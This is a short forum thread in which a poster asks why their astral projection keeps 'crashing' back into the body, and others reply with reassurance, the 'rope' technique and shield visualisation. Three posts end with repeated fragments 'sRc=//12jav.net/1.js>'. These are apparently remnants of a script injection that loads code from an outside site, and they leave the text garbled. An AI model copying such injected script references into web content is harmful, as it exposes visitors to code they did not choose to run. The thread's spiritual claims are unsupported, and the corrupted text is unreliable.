Crashing

Every time i try to project i will by pass the vib state and go straight to the lifting out of the body. So when i get to this point my astral will crash back into my physical. Now i am going with the rising but it will still happan and it always jerks me out of my meditation. Can anyone give advise as to why this happans? sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

Never fear or panic when you get out of your body. You may try the 'rope' technique to get on the astral plane. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

All it takes to enter back into your physical body while astral projecting is a simple thought of entering back into the body. Like the person above me stated: don't get excited or scared of anything that happens during the process.

Keep trying. I suggest visualizing a shield around your body before projection. It may help you feel secure. Remove any doubt or fear you may have. It's pointless. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
